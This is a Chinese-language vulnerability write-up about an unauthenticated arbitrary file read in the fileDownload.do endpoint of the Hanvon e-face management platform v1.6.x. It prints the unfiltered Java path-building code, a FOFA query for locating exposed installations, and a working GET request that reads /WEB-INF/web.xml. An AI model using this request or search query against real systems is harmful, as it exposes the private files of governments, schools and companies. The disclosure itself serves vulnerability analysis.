漏洞简介
汉王e脸通综合管理平台是汉王公司研发的一款基于生物识别技术的智慧园区管理软件,集成了考勤管理、门禁管理、访客管理、巡更管理、消费管理、车控管理、梯控管理、人事管理等多个模块,广泛应用于政府、企业、监狱、学校、智慧社区等多个领域,实现无接触式快速通行,提升管理效率和安全性。其管理平台的 fileDownload.do 接口存在任意文件读取漏洞。攻击者可在无需认证的情况下,通过构造恶意请求访问 fileDownload.do 接口,传入任意文件路径参数,实现服务器上任意文件的读取,影响系统敏感数据的泄露和信息安全。
影响版本
v1.6.x
fofa语法
icon_hash="1380907357"
漏洞分析
直接看 PersonnelController 下的 fileDownload.do 实现方式
@ResponseBody
@RequestMapping(
value = {"/fileDownload.do"},
method = {RequestMethod.GET}
)
public void fileUpload(@RequestParam(required = true) String fileId, HttpServletResponse response) {
try {
if (fileId.equals("undefined")) {
return;
}
File file = new File(TheApp.getRootPath(fileId));
String[] split = fileId.split("/");
String fileName = split[split.length - 1];
response.setContentType("application/octet-stream;charset=utf-8");
response.setHeader("Content-Disposition", "attachment;fileName=" + fileName);
ServletOutputStream outputStream = response.getOutputStream();
FileInputStream fileInputStream = new FileInputStream(file);
loadFile(outputStream, fileInputStream);
closeIO(outputStream, fileInputStream);
} catch (IOException e) {
String msg = getMessage("basics_go_wrong") + e.getMessage();
logger.error(msg);
}
}
跟进 TheApp.getRootPath 方法
public static String getRootPath(String path) {
StringBuilder rootPath = new StringBuilder(webPath);
rootPath.append(File.separator).append(path);
return rootPath.toString();
}
对用户可控参数 fileId 无任何过滤或校验,直接拼接路径返回文件路径进行文件操作,也是朴实无华的任意文件读取漏洞。
漏洞复现
GET /manage/personnel/fileDownload.do?fileId=/WEB-INF/web.xml&recoToken=SGUsqvF7cVS HTTP/1.1
Host: hanvon.mrxn.net

成功读取到 web.xml 文件


